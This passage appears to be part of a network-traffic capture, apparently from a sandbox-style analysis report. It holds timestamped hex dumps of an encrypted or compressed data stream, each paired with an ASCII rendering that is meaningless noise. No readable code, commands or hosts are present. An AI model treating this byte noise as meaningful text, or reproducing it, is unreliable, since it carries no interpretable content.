1f 6c 77 d0 15 80 a3 e4 3e 0d 60 ad fd 01 4a da 34 4c 64 02 62 b8 a2 03 e8 77 cb d9 1f f5 60 94 82 15 6a be 5f 09 90 e8 f0 c7 86 e5 1d d9 b7 d0 dc 0f c9 36 ab ca 1e d9 03 33 36
                                                                                                        Data Ascii: io}Rgc6K(<eNMXX:oF%oon+%c~6w.LelL=k=Y&CcG\}4[|bIh]SWM<p8td]X"@}E>n"Isag\Cf2b+lw>`J4Ldbw`j_636
                                                                                                        2022-09-29 12:46:35 UTC13676INData Raw: 18 1b ee db b1 da c1 51 d0 a8 8a c3 a5 ab 5c 64 ba 78 37 a9 c6 8b 62 e8 85 70 9f f9 ae 8c d2 86 a9 55 ea d1 d0 5b 84 5e bc bc 07 02 92 a2 5b f1 59 64 5e 8c 05 6a 0c 31 c9 9a be ea 78 28 b8 92 b9 2a af c1 ac 06 3e eb b6 b1 fd 15 0b a5 f5 47 cf a8 60 86 42 c3 b6 3a 92 21 5b 7e 98 de f6 c6 14 10 69 97 ab 00 f5 9d b1 48 b7 7f f1 a3 54 03 1d a0 08 b9 b6 46 f3 e4 e5 48 40 c3 a3 28 81 cf 3f 2e a6 1e b1 46 19 9a d6 62 77 0a 01 b4 c4 9f 70 28 c1 e6 43 52 f3 c4 b8 db 25 c4 0b 9f 6e 47 10 38 25 8d 24 4c 6c 93 63 7c 49 0f 71 76 8b 15 1f 9a 70 40 9e 2d 43 2d 77 fe 61 69 df a4 a2 03 ca 67 0a a1 43 e7 84 68 ec 3b b3 83 f2 7f 99 04 27 22 ef 1b de a5 7e f9 8e 0f cb 6b 89 47 3f 0d 4c 24 dc d4 e6 09 0f 87 86 44 5a 44 c4 7c 03 f7 80 f8 fc 39 73 07 1c 54 eb ce d6 cc c6 aa 44
                                                                                                        Data Ascii: Q\dx7bpU[^[Yd^j1x(*>G`B:![~iHTFH@(?.Fbwp(CR%nG8%$Llc|Iqvp@-C-waigCh;'"~kG?L$DZD|9sTD
                                                                                                        2022-09-29 12:46:35 UTC13692INData Raw: 59 f3 e2 55 c9 4f 68 b4 c4 f7 da 86 da 50 f3 be 74 69 ab 52 07 da ae 94 d1 c1 07 e1 c8 71 ce 62 6a 2f 17 2a d2 ac 4e 9a d0 55 85 2b 22 b4 d8 e7 d1 a4 69 da 9a 58 fd 1e e5 df 8f 7b 17 8d b7 05 c1 7c e1 90 74 d2 8b 39 98 90 68 94 8b 40 fe fd 78 fe 90 bc 57 55 eb 7f c7 7d f0 7e b4 d6 7c 8d a3 a3 da 2c 4d 81 d4 6d 3f 8b 49 85 e9 99 2f ce 6d f5 ae 4b 3f c2 72 e4 6d 08 84 6d 0b d3 9d f7 48 93 ee 4e 41 9b 42 d1 dd c3 d0 57 fd bb 42 d3 65 f3 94 f4 32 94 b0 53 c5 35 d3 ad 09 4a 2d 61 44 8a 9a 43 d6 0c e0 e3 26 6b 8a 8a d4 90 19 e4 5e 53 db e7 48 2a dc f6 50 f3 89 9d b1 99 23 a6 9b 32 a3 6a 1f a4 c6 b3 03 eb 06 16 c8 7c 6d d3 be 4f 17 ac 03 ad bf 1f 8a 47 26 88 e5 d4 9d 3a 06 68 8b 65 2c 35 0d aa 89 10 72 0c f3 60 8c f1 e7 9b 5e fc b0 27 fc b4 58 dd 0c c9 80 d2 1a
                                                                                                        Data Ascii: YUOhPtiRqbj/*NU+"iX{|t9h@xWU}~|,Mm?I/mK?rmmHNABWBe2S5J-aDC&k^SH*P#2j|mOG&:he,5r`^'X
                                                                                                        2022-09-29 12:46:35 UTC13708INData Raw: 05 fa 7b 58 3c 3d 65 26 e3 17 92 dd 8c 6d 41 cf 72 02 39 bc ba c4 27 05 9d dd 1e cf b6 8d 68 ec 0c cf cd 23 00 dd d9 a9 11 fe 3a 34 e4 d0 af b4 35 c3 b0 3c 54 13 8b 71 13 08 af 1e 4e 0e b4 63 c9 84 83 0e 42 6b 23 c5 70 2a b6 5a 8a 80 d9 be fb 1b 89 6c e2 24 e5 95 1e 6f ad 3d a8 ca e0 df 95 47 a5 89 a7 14 b3 1f 4c 35 19 de 48 c2 30 84 6d 94 6b e5 af 69 df 7d 4d 3c 8f 7c b3 31 1f fa be 66 1a a7 ba 4c 93 7e 34 27 f6 7a aa f5 31 df 83 57 51 0b c8 0a f2 08 95 50 15 5d 9d 4b 05 7a d1 f0 2d 3d f2 a6 e7 4c dc 28 c9 90 24 58 dd 7d a8 aa 42 b8 cc 0b 06 66 c4 66 4e 9c 07 ff 9f 0c d1 f2 83 f7 f7 b0 81 dc a3 e7 f7 5d 5a 8e 10 89 9e 74 97 c3 71 f8 11 d1 ba 1a 04 cc 39 57 13 83 4c 9f fc 33 33 35 8a 4c 1c 9e 10 57 7e 35 0a 50 e5 eb ed a9 dd 6e a4 8a 60 30 da 64 6a 32 fa
                                                                                                        Data Ascii: {X<=e&mAr9'h#:45<TqNcBk#p*Zl$o=GL5H0mki}M<|1fL~4'z1WQP]Kz-=L($X}BffN]Ztq9WL335LW~5Pn`0dj2
                                                                                                        2022-09-29 12:46:35 UTC13724INData Raw: 11 ff 41 9a cb e8 6c 48 f1 30 b5 b3 10 9e 26 22 bb 26 8c 9c 3a 89 90 a1 66 90 c1 be c8 89 d7 95 9a 19 44 a2 e0 43 44 fb 12 88 f7 fa d4 2c c6 8f c3 c4 05 25 44 7a a2 47 63 58 7c 32 24 c7 70 60 bb 3c 5a cb 4e ae 7b 5a 32 e1 88 1e 1c f4 5a b0 88 85 8a 29 af 14 e4 ca 4a a7 1a cd 90 96 29 f5 8c 9c df 1a e6 41 48 1f a9 a7 db 00 dc 79 1b 62 a7 aa 45 f3 4a 97 f6 20 ea 2c 35 1f 7b ec cc da 6e 9f fd e3 48 37 be 7a 4a 63 88 66 f2 41 d3 13 47 bb 33 50 83 a6 f6 e4 79 53 41 b6 e2 18 29 dc 62 b2 49 2e eb 1f 86 1f ff 70 d9 9e cc 67 3c 4a 4b 01 18 7b 6b 1f 1a e9 ea 99 c3 57 d5 a4 44 f9 7b bf 33 86 bf e6 72 7e 89 0e a8 b2 04 c5 ad f7 77 f4 5e 52 46 80 50 e1 3c c6 9e cf 3f 59 fb 87 9a 45 83 41 1a 81 ce 65 a2 91 d0 ed ae 9c 5d 9a 70 12 f6 dc 5a 70 32 0f 9f 28 e2 22 bd dc c1
                                                                                                        Data Ascii: AlH0&"&:fDCD,%DzGcX|2$p`<ZN{Z2Z)J)AHybEJ ,5{nH7zJcfAG3PySA)bI.pg<JK{kWD{3r~w^RFP<?YEAe]pZp2("
                                                                                                        2022-09-29 12:46:35 UTC13740INData Raw: 9a 68 6c 47 fe 9c 66 ed 08 93 b1 ee 25 13 c5 68 bb 7b 97 45 cf 9e 9b 71 ca 71 0c 77 5d 25 28 5f ac f9 44 db b2 37 a4 77 52 65 92 cc 0e 24 7f 29 29 2c 10 44 90 80 75 77 de ca 63 72 ae 51 ff 83 3f 2d 81 e5 14 59 16 f1 c7 b1 c5 d2 74 ae 6a 1c 3e 99 39 94 c8 c4 c7 e7 bd ca 12 84 bd b2 f2 06 28 0f e3 9e c9 5a de 01 58 24 54 23 38 8d 7e 86 71 98 e4 a4 f7 47 35 6c 93 d2 a8 e0 70 db 97 f2 30 77 fd 27 b3 f3 8f 52 2e 4f bd 1f 0b fa a2 ba 53 1c 16 5c 19 88 c2 63 c0 2d b3 94 42 98 a4 c7 13 87 55 0a 9f 88 a2 7f ac 1b 0a 10 d4 ff b0 3a 2a f0 63 34 b9 92 8a 21 8c 4c ad e2 d7 52 be d2 2f 64 99 10 0f 86 ad 2b b0 3e df ba 46 50 66 4b 82 a2 5c 9d 49 47 17 bf b1 a2 76 dc c4 bd 0e 86 bf b8 5f eb 89 cb 67 77 a0 d6 e8 0e 7f 5a 32 7f 2a 69 4b 1d e6 c9 3a d2 39 54 bf f2 3c 44 f2
                                                                                                        Data Ascii: hlGf%h{Eqqw]%(_D7wRe$)),DuwcrQ?-Ytj>9(ZX$T#8~qG5lp0w'R.OS\c-BU:*c4!LR/d+>FPfK\IGv_gwZ2*iK:9T<D
                                                                                                        2022-09-29 12:46:35 UTC13756INData Raw: 9b 1e bd 40 51 92 d4 ac 05 da 83 dc 6a f6 8c 95 fc 31 43 4f 76 c9 82 a7 51 5a 8e 04 44 a8 96 00 9b db b3 b9 51 c1 c0 94 b4 c8 64 94 88 4e d0 c6 fe 61 17 52 95 38 5b b3 5b 85 0e fa 50 bb 0f 7c 07 e0 e5 65 3f 18 51 0e e5 74 28 a8 54 d2 4d 1c f5 91 ca 47 b1 30 ff 85 18 14 5c 37 1e 50 ca 53 e9 64 21 eb 79 c8 17 03 0e 84 f9 15 7a 48 43 fa 58 e7 57 f6 ab a0 94 76 f1 f5 5c c3 b5 d1 24 0a f4 a8 94 a4 8d b5 09 e2 e6 c6 ea b0 fb ce e6 86 05 57 df db 6b 1b dd c3 58 f6 94 c1 09 4a fe 3c 2c ba a5 2f 2e 24 1c 1c 92 bf 88 c9 dd 2b 57 08 23 ac 39 7d 96 48 dd 92 ba 21 8d 0e a0 d0 f0 b1 6b af 88 b1 f5 5f fc 63 d6 73 23 ae 91 61 d9 82 61 69 b5 b2 61 79 bc 1a 0d f6 98 87 98 f9 cc be ad 20 d1 e5 45 d5 ec 4c bf 3f ee 3d 76 a5 43 a6 ec 2b 75 f9 50 b1 d4 97 fd 6a f7 02 f9 b2 20
                                                                                                        Data Ascii: @Qj1COvQZDQdNaR8[[P|e?Qt(TMG0\7PSd!yzHCXWv\$WkXJ<,/.$+W#9}H!k_cs#aaiay EL?=vC+uPj
                                                                                                        2022-09-29 12:46:35 UTC13772INData Raw: 8b 96 8f e9 c8 40 86 30 43 9b 17 79 b6 21 ad ec cf 7b f7 12 74 b9 3f 7c 97 7d 3d b2 15 b7 f3 cb 9b 4a 63 a5 b8 f1 a3 4f 1c 48 78 2e 10 ae 77 77 4e 31 09 7f 4e d3 3a d9 1a fe 3e c1 ac 92 ed 73 ed a1 00 cd 56 9f 15 1c 4b 6b b9 5c bf 98 29 0a ee f3 33 85 2b 02 2e 8b 7f b2 c8 4c b0 26 6e cc e9 7f 8f 7d 8b 31 6c 07 dd 27 f3 21 1c 69 28 77 3b 5f 31 d2 c0 5e 98 39 9d 79 9d 2c 24 fe ef e5 09 e7 21 ab 55 b0 db 43 2c 2d a1 db 46 a2 1e ad a9 ea 9a 7f d1 aa e7 17 15 43 da f7 15 fd 2d c7 c7 6d 9d c0 ce 4e 7e a8 cd c8 0e cf e5 91 ad bd 5b 52 fc 1a b3 01 aa 29 61 aa 45 2f 29 a3 37 03 79 af 42 90 1a bc d5 d4 5d 3f 9f 60 07 8c c0 e6 50 69 48 5e 9f c4 cb f4 f1 f6 a7 26 f0 b1 e7 62 c8 ea 15 7f d1 45 da 2a c9 f6 03 ec 8e 49 22 31 cc d2 60 87 4c 78 74 93 27 48 1f 3b c9 66 cf
                                                                                                        Data Ascii: @0Cy!{t?|}=JcOHx.wwN1N:>sVKk\)3+.L&n}1l'!i(w;_1^9y,$!UC,-FC-mN~[R)aE/)7yB]?`PiH^&bE*I"1`Lxt'H;f
                                                                                                        2022-09-29 12:46:35 UTC13788INData Raw: 98 2a 42 b7 5f 9d 31 0f dd 34 a3 32 4f ba 17 9b ab a2 32 37 14 89 3a 1e 6b 17 a2 e6 67 80 62 a2 b9 40 a3 3c 96 b5 dc f1 ae 97 b7 c3 6d 51 e5 37 8a 56 ab 6a be ba c6 ef 40 5b 44 de 72 7c ad 00 9a bf 8b 85 6f 75 91 29 65 a9 f4 12 28 bb 43 a9 bf d4 95 8f b3 e5 76 6c ed 58 c7 9c 4c cc b7 ee 24 43 d8 4e 10 d4 a8 e1 ba 20 17 36 1f ea 61 11 49 fc 6c 1c 74 7d cf f5 79 f2 bd 32 49 85 9d af 5e d2 2b 9e b6 ed ce bc 06 b7 36 70 6a 5e 41 b4 29 40 6f 72 ec ba 40 62 15 76 c7 ab 76 16 2d d4 b8 3e d5 75 e3 63 41 58 49 e1 73 ed 61 34 d0 94 60 fe 8d bf ae 4b 56 c9 6f b8 32 1b e2 01 8b ee 0b f4 a7 8c ca 84 51 07 2f b3 f3 2c be cd 28 74 91 ce e1 4f fc 40 a3 d6 cb 3e 2c 47 4f ae 08 23 2f 6c d0 38 5d 67 c4 c7 89 4a 55 07 22 8a 29 c2 3c 34 d6 da bb 34 b8 a1 eb fb 3d d6 45 bf b7
                                                                                                        Data Ascii: *B_142O27:kgb@<mQ7Vj@[Dr|ou)e(CvlXL$CN 6aIlt}y2I^+6pj^A)@or@bvv->ucAXIsa4`KVo2Q/,(tO@>,GO#/l8]gJU")<44=E
                                                                                                        2022-09-29 12:46:35 UTC13804INData Raw: 0d 9c 2c 6f 90 0c 78 58 fc ae 44 40 5a dc f1 c4 46 19 3e 90 ab 29 c4 c6 bf 62 0f 8d d7 19 1b 91 33 d1 a1 4b 44 df 7b 46 c2 50 10 d3 b7 c8 7b a1 cf a7 f5 2d d4 51 38 f9 7f e6 d7 36 d3 98 7f ba 87 c6 5b 34 35 65 d2 36 bc f8 dc 7f 79 b1 c8 cc a0 0d 0c 80 fd 67 03 84 60 14 59 6b 44 db 59 17 f4 9b 7d 28 bf 82 29 e7 59 49 11 90 16 1e 14 93 4b 82 13 e6 ca 98 f6 70 bf 59 c9 2d b8 c1 74 24 d2 df 6a 67 9e 58 86 14 90 28 59 c1 2e b8 8f c4 d4 04 5c fc 5a 82 81 7c f9 40 31 52 50 cf e4 0e 71 b1 95 7b f8 ac 76 b5 ee e5 c8 96 a1 75 2e 60 6b 9f 0e 1f 20 78 f6 0c 2c 6c e4 9e 8d 03 6c 40 80 c6 c6 a8 14 79 9e 5c 01 6b 0f ed c8 c1 ca 6b 4a bc 04 61 87 f2 96 58 de 41 48 c2 1e 9d e9 d8 97 a8 27 f9 c7 0c 44 06 f3 98 50 b7 4d 82 2b ce ed e4 83 04 7d 10 f3 b7 82 12 59 30 b1 29 9b
                                                                                                        Data Ascii: ,oxXD@ZF>)b3KD{FP{-Q86[45e6yg`YkDY}()YIKpY-t$jgX(Y.\Z|@1RPq{vu.`k x,ll@y\kkJaXAH'DPM+}Y0)
                                                                                                        2022-09-29 12:46:35 UTC13820INData Raw: 0d 55 85 d8 71 de 16 4f 8f 63 94 38 8b 4a 5b 5f 66 2a b4 36 d1 53 e5 9d 66 db c5 45 15 d1 0f 00 ab 3c 9d 9f d9 1e 2c 08 65 2b 07 74 c2 2e 93 59 28 2b ef 61 e0 d5 03 66 50 5d 5b 27 41 35 f1 2c 3e 77 69 7e c4 75 ce e7 e0 81 2d ad 0f 58 75 64 f4 fb 9c ef 91 47 fd 5a e7 82 85 b7 f4 e9 28 fd ff 61 95 8b 7b b7 42 51 13 d5 4a 02 47 39 6e 57 bd b8 31 d4 39 dd b8 da d2 32 ae 1d b8 26 44 0a e7 f6 e5 5e 9c db f5 bc 4f 8b fb c6 e5 c8 f9 e3 fc d0 10 88 50 47 b1 48 7c be e6 85 92 04 b7 3b f9 1f d4 de 35 50 d2 01 6f c9 9f f9 40 ce be 9f d1 44 79 0a 07 ef fc e5 90 72 6e cb 9d ee 2b 3f 48 32 07 f7 ef 99 6b 9d 6e af a4 bf 20 09 29 6b 0d 37 7d 31 39 63 38 d0 d5 88 d0 37 c4 27 36 50 60 be a2 22 62 d5 14 b6 79 c1 21 d2 ad 0d 8c ec fe a5 48 7f fd 73 ea 75 26 6b d9 16 7f ad b0
                                                                                                        Data Ascii: UqOc8J[_f*6SfE<,e+t.Y(+afP]['A5,>wi~u-XudGZ(a{BQJG9nW192&D^OPGH|;5Po@Dyrn+?H2kn )k7}19c87'6P`"by!Hsu&k
                                                                                                        2022-09-29 12:46:35 UTC13836INData Raw: 14 86 26 c6 91 e7 09 ba 0e e7 54 da f0 24 de 45 ac 6d 83 7f bb ed 8a e0 d8 a7 71 81 33 5a f6 05 e2 5a 44 54 c9 8a a0 3d 6f 8c 96 8b b3 3b f6 13 72 40 15 44 c7 f9 f2 76 c6 77 d9 88 cc fc a4 6b 6b 0e 06 0b 35 51 51 ee 8f a6 2f b4 55 25 65 2b d7 8c 6c 32 4d e8 b5 64 50 c8 f2 19 3e 75 74 f8 80 4d e5 16 aa 12 41 af 80 0d 74 59 cf 83 ba de 1b 7a 69 7e 59 a1 08 2f 05 e9 68 02 c2 b1 fd ba bc 8b c1 fa fa 97 cc 23 c7 dc cd f5 f4 b3 39 ae a0 af 6a 32 fd 8c 21 15 68 5a f7 5f 75 15 5b 5d c4 53 45 55 e9 ff 86 75 1a 4e 9f 34 66 1b 9b 1c aa 5f 44 dc 41 de 8d 87 e3 33 81 40 83 f1 15 bc 35 94 27 d4 e0 40 06 06 5b c4 f2 58 c1 b2 3b d5 b7 70 7f b0 f0 ec 99 a5 b5 66 a3 be 88 e0 79 62 51 69 37 ef 35 e3 eb 43 f9 d8 f7 b0 a1 ab 2a ff 04 da 66 b7 84 1c bc 92 b9 d0 8b a0 19 ca 5d
                                                                                                        Data Ascii: &T$Emq3ZZDT=o;r@Dvwkk5QQ/U%e+l2MdP>utMAtYzi~Y/h#9j2!hZ_u[]SEUuN4f_DA3@5'@[X;pfybQi75C*f]
                                                                                                        2022-09-29 12:46:35 UTC13852INData Raw: ff 46 34 51 94 90 f5 32 c1 20 fb 47 d4 18 3b 24 c7 84 42 c1 10 fd b0 77 3b 5b 77 76 98 f2 d2 b4 2a d2 ad 61 3a b6 8e 42 e6 3c 4d 70 e1 e9 2c 2e 7a 88 93 ef 0e 46 3a a2 c3 67 3c f4 8c 22 a7 5e a1 cd f7 f7 2e 86 24 6a 57 9c 37 e6 c5 ee fd 33 fe 80 f4 28 91 5d 6b 73 3f 65 ab 6c 5d db 34 f0 2f 9e a2 ba 40 b7 57 58 a5 36 eb a6 08 fa aa a6 e2 71 33 61 8e 0e e7 3d 36 44 22 5d 49 02 22 da d4 c4 5c 21 25 a9 0b 0b ca 8f cf f8 40 ff 93 c8 f3 32 40 01 63 ad 65 6d 12 24 e2 38 29 62 5f 80 b7 7f 2a 20 0d c9 a8 4e c3 8c a0 ab a9 f8 7b d5 64 46 7b ba c6 da af 32 2d 22 13 40 92 5a 6c fb 72 d0 80 fc 38 8a 49 b8 55 2c 75 17 d0 9c b6 30 d5 55 91 5c 0a e7 41 c5 0b 6f d5 2b eb a8 c8 39 6b 27 86 9d 4c c2 3e 6d 56 af 64 bb 3e 15 82 68 94 9a f5 9a 89 ac 2f ca 66 fd 6e 92 8b 5b 3c
                                                                                                        Data Ascii: F4Q2 G;$Bw;[wv*a:B<Mp,.zF:g<"^.$jW73(]ks?el]4/@WX6q3a=6D"]I"\!%@2@cem$8)b_* N{dF{2-"@Zlr8IU,u0U\Ao+9k'L>mVd>h/fn[<
                                                                                                        2022-09-29 12:46:35 UTC13868INData Raw: ff db ef 9d a9 4a 1d 11 71 bc bd fc bf d0 4b fd e4 34 aa 07 45 cd ee 33 75 80 a8 41 6b 13 dc 94 d0 e3 f9 9d 3a 25 b9 aa 39 cb 47 40 8f 9e 98 44 42 43 b8 79 a9 d7 b5 6e ba 77 8f 36 05 d3 ea b1 ab fb eb 1d 6a 98 dc 4d 1b 36 f9 a6 d5 f2 e5 00 7c 46 aa ad 04 14 26 b5 e9 11 34 25 a2 3f 2a 3d 20 28 a7 bd 65 79 1f 62 88 eb ab 62 11 d3 31 9c 7a 43 f7 19 61 df 80 05 4f 87 c7 37 e0 41 01 48 d8 d3 31 d9 3b 50 5e 00 4c 3c ba a6 6a 50 5c 83 1e 5f 48 3f 9c 9a 7e 2d 33 dc d9 69 1b b7 8c 90 18 32 d1 e0 28 94 15 9f 41 7b 38 54 53 d3 3a d3 c7 06 fa cb f0 e5 aa da 14 f4 57 48 36 2d 9a e5 63 5a 5d a0 e5 d6 b9 ef 34 66 e9 db 18 e9 d2 ec 4f 45 f2 bc 2d 58 6b dd d8 b7 76 14 c5 4f af 33 af bf 45 f5 b2 fd 3c 74 67 a1 44 ca b5 bb b8 f0 ba d7 2d 30 95 61 b6 ab bb e3 0a 9f 15 96 cf
                                                                                                        Data Ascii: JqK4E3uAk:%9G@DBCynw6jM6|F&4%?*= (eybb1zCaO7AH1;P^L<jP\_H?~-3i2(A{8TS:WH6-cZ]4fOE-XkvO3E<tgD-0a
                                                                                                        2022-09-29 12:46:35 UTC13884INData Raw: c8 79 13 b5 57 a1 01 79 ac 9b 82 c9 d3 19 de b9 d0 5a ba c3 54 f8 81 4a 38 46 09 41 08 15 c4 eb 05 94 82 e4 47 9f 29 c5 60 d8 26 4e 3d 60 f0 dd 05 b8 bd f0 01 42 35 aa fb ce d5 8f 3a a6 45 a3 ea dc bd 1a 5b 20 e0 0c 99 0a 01 0a f9 ab d4 86 1d 7b 78 ff b5 fd 5f 9f e1 56 ee fb 98 51 a0 95 bb cd 46 13 2b d2 f4 a5 7a 7c 03 a7 fe 2b c5 b9 00 b4 d0 c7 40 69 c5 41 cc b9 48 88 0f 5b b6 03 ed ec 79 f4 fb 93 68 cc b9 8c 85 88 e4 7b 5f 00 8e 6b d0 d3 ed 5b 90 3a 6d c6 f9 0d 3a 7f 96 62 51 7b e4 12 00 9e c6 09 66 cb 4e 0c 41 30 fc 00 66 ec 9a 7b 0c 7d d4 19 c4 22 b5 e4 9d ec b1 67 08 e9 0d 5d 19 dd e4 1d 89 1f 79 3b 5c 53 48 50 85 50 06 be 77 d3 d3 fa 0b 58 14 42 26 a3 43 e3 82 cf 21 80 02 67 29 20 e4 8b da c0 5a 78 4d 91 46 36 b1 38 7b 92 e7 f7 ee e1 78 97 1e f6 35
                                                                                                        Data Ascii: yWyZTJ8FAG)`&N=`B5:E[ {x_VQF+z|+@iAH[yh{_k[:m:bQ{fNA0f{}"g]y;\SHPPwXB&C!g) ZxMF68{x5
                                                                                                        2022-09-29 12:46:35 UTC13893INData Raw: b7 d1 70 93 ba c8 82 12 78 20 10 de e2 ff 02 86 ab 3e e3 fa 31 42 74 04 f4 80 59 ca 15 0e 88 7b 6a a5 09 75 65 75 21 96 8d 6e 90 ad 53 ca 84 4e e5 92 ca 63 bf 0c b5 d0 36 7f 02 18 86 fe 6a ee 03 22 38 07 71 c9 64 9f 33 67 cf a9 10 be 1d 3d 3a e6 59 70 63 4e 28 d9 de 4f ec 34 99 cf ab 17 1a 73 dc 59 eb ed 1a 81 55 2f 31 4c 43 f1 b4 7c 29 0b e7 93 e8 95 71 33 09 f4 b8 f8 0c 7e 13 46 b6 bb a0 6d 67 da 05 e3 49 b7 ba 1d 54 01 2b 9b 9c 94 6e 27 42 d0 e1 f4 54 a6 0d f2 e0 ac af f0 27 10 86 ef 1c cf 0b 06 4f fd de b9 bc 16 d8 c9 2a 41 12 1b 0e 4d fd 21 3b 28 63 09 f1 94 b8 a4 02 1f e3 db c9 61 ea e7 20 29 a6 48 77 ac 10 9b 86 17 a5 cb c2 b1 78 8d cf 18 22 89 a3 1c 4e ec 73 62 ed 68 d2 0b 0f 58 8f 6c 39 89 7f 2f 28 40 ba 27 0b 8b bd f6 9f 2b b6 d6 43 92 b6 f5 81
                                                                                                        Data Ascii: px >1BtY{jueu!nSNc6j"8qd3g=:YpcN(O4sYU/1LC|)q3~FmgIT+n'BT'O*AM!;(ca )Hwx"NsbhXl9/(@'+C
                                                                                                        2022-09-29 12:46:35 UTC13909INData Raw: 77 2e b7 e1 d7 16 8d 7c 22 01 c5 22 d9 b0 a5 bd 2e e0 7f d9 43 ba ff 8a e9 71 e9 dd 37 fa f4 a4 a2 3d a1 77 57 7d f1 69 d5 7a ae bf 1c 3f af c2 f5 13 63 72 70 54 63 ca 7a fa 56 e9 d0 de 2a df ed 2b a3 fd 0a 9c 2a 42 fb 2b b1 43 78 46 8f f7 50 5f 4f c9 3e eb b7 86 b4 ef 1c d8 b5 89 60 9e 72 21 f1 a2 f3 41 9f 78 9e b3 c8 12 2a 74 bb 43 79 a1 be 95 bf af 51 60 4e b0 c1 a3 5d 44 95 30 3f 25 43 40 45 a9 84 c1 18 3e d1 f8 5a e9 77 df fc d4 48 6f 82 90 c5 9a 1a 25 4f dc ed 72 0a 0c 79 a6 1f e1 aa 08 d7 b5 f9 b7 aa 9a fd c1 51 c4 8c bb 3d b4 44 85 90 88 19 66 3b eb f4 02 a3 5e f0 93 3c 9a 8c 42 5f 60 19 18 1a 9a 13 18 84 28 4a f2 85 61 a5 8f 55 bc c1 ce f4 b5 3c a5 4c e0 89 6c 86 59 b0 9a 93 94 aa af cf 86 e3 9a b8 93 2b 21 be 6d b6 16 8a b6 b3 a6 60 3b 9f cd e7
                                                                                                        Data Ascii: w.|"".Cq7=wW}iz?crpTczV*+*B+CxFP_O>`r!Ax*tCyQ`N]D0?%C@E>ZwHo%OryQ=Df;^<B_`(JaU<LlY+!m`;
                                                                                                        2022-09-29 12:46:35 UTC13925INData Raw: de 0e 01 f4 2b 41 b9 46 f6 71 6f b4 a3 ad 65 c0 da 98 37 78 82 6f c3 02 7a 93 5c 57 19 02 00 4a f7 a4 81 e2 ce 90 f7 d3 45 fd 51 60 4f 6a cd 44 53 d7 e8 d5 3d af 78 3a bc c2 e3 d7 f7 9b e7 32 2c 3d e2 fc 29 00 b4 4b 01 9f 1b 6e e5 24 6a dd 32 0f 23 46 02 94 27 7e 80 26 5e 18 9e 50 d7 72 0f 7f 1c f6 47 64 d8 a9 0a 70 41 69 1f f2 e2 01 41 94 df ed a5 90 d1 fc 1f 79 93 42 85 f5 5c 2b 24 4d fc 09 3a b2 cd bb d8 5d b9 fb a9 01 ff c8 48 53 e5 cb c5 b0 93 7d 2c c2 5a ce 97 b0 d5 dd 4d 93 43 ed 86 9a 21 9c af 34 94 21 08 0e ef 88 bf d2 7f 94 db ff d8 b7 b1 3b 3b 2f f6 28 8c 0e aa fe 14 69 16 2d 03 56 aa 17 89 30 48 d2 5f 9c 00 fa 25 8c 69 1d da 5d 01 81 16 7b bb 07 df b9 43 be db 26 3a f1 90 69 19 fc 7d 18 0b 46 5c b6 02 1d f8 cf f2 6a 69 5d 42 76 d5 da 38 71 4b
                                                                                                        Data Ascii: +AFqoe7xoz\WJEQ`OjDS=x:2,=)Kn$j2#F'~&^PrGdpAiAyB\+$M:]HS},ZMC!4!;;/(i-V0H_%i]{C&:i}F\ji]Bv8qK
                                                                                                        2022-09-29 12:46:35 UTC13941INData Raw: b9 02 37 2e a3 23 b2 b5 80 a2 cf db 14 df d0 de 0d 37 5e 42 4d 91 49 02 e3 2d 33 13 65 c7 87 ed 90 6f 99 dc a6 7f ec b2 48 ba cb 10 1b 30 90 8f 0e ee 4b 1a 3d 32 97 d3 28 be fe 96 3b ae 7b d9 ec 58 f0 9b e9 32 4a 93 46 ce 39 65 d4 d7 78 b0 cd ae b6 38 ea c9 a7 ef f3 4d d5 cd e1 fc 32 6d bb 83 8a c4 5e e4 7c e2 4c b7 32 a4 79 87 85 f8 c7 d7 ce 61 44 4a a7 6c 1a 49 6a 37 a9 94 ac 02 e1 02 d4 15 c9 f8 a6 79 d0 47 4d 5b 50 8f 38 b0 a8 c6 eb f5 df de 9d c9 aa 45 8b 1a 36 5c 2e c1 a3 c2 0d 24 96 41 b0 6c 94 44 33 cd 73 12 cd 19 93 47 c3 a5 1d c3 e7 e7 8e 43 30 a5 7a 1b d9 e2 a5 b0 81 37 dd db b9 27 39 ec 9f 7e 1b 22 d7 41 42 24 f7 5f 7e db 11 bf c7 f2 0a cb 68 fc bf 4b 98 1e 0e 3a ab 8c 94 57 f2 08 69 d9 34 2f ce 59 98 5c 67 32 7e 21 6d cb 76 23 65 5d 19 9e d9
                                                                                                        Data Ascii: 7.#7^BMI-3eoH0K=2(;{X2JF9ex8M2m^|L2yaDJlIj7yGM[P8E6\.$AlD3sGC0z7'9~"AB$_~hK:Wi4/Y\g2~!mv#e]
                                                                                                        2022-09-29 12:46:35 UTC13957INData Raw: 08 37 e0 8c 9a ff 4f 4b 5e 27 55 f2 17 c6 8c 77 87 30 06 75 56 8b e3 a5 7b 83 20 66 e2 e3 7b f4 41 3b d8 00 de 44 b1 98 87 29 88 16 d5 2a b8 9a 1d 34 fc f7 67 35 95 92 be 16 28 ba ad ec f3 dc 9a 1a ad 9a e2 60 af e5 d5 76 e2 ce 9c 25 33 1b 6d 06 d8 c9 5e c5 0a 44 4e 6a 3e e5 cc 47 cd c7 ef ee bb 05 9c 00 5c e7 2a 79 29 e3 35 43 af 38 c1 cc 81 a9 da 3d b4 19 39 9a 41 cd 9a 5a e4 c2 cb 9e 29 c8 b7 a9 60 94 58 15 23 50 85 16 f9 dc 0b ed 8f 7a 25 1c 96 17 c2 c7 32 0f 7e cd 9e 54 9f 9b 0e bd ec fd bd 42 01 6c 87 b6 d0 b6 20 4e ea 70 40 3f 9e 12 a3 c7 c1 90 96 79 65 60 2c 2a 93 10 18 cc 60 25 48 f4 5f af d6 55 26 57 cb f3 9d 78 5d 4f 63 9e 45 b2 e6 f1 ff a4 c1 23 14 b3 8e 29 d1 6b ad 0c 3b 9a 94 5d 55 09 c9 9d fc 29 80 cc c8 69 3b bc 98 c8 af 17 4c 02 e4 52 4a
                                                                                                        Data Ascii: 7OK^'Uw0uV{ f{A;D)*4g5(`v%3m^DNj>G\*y)5C8=9AZ)`X#Pz%2~TBl Np@?ye`,*`%H_U&Wx]OcE#)k;]U)i;LRJ
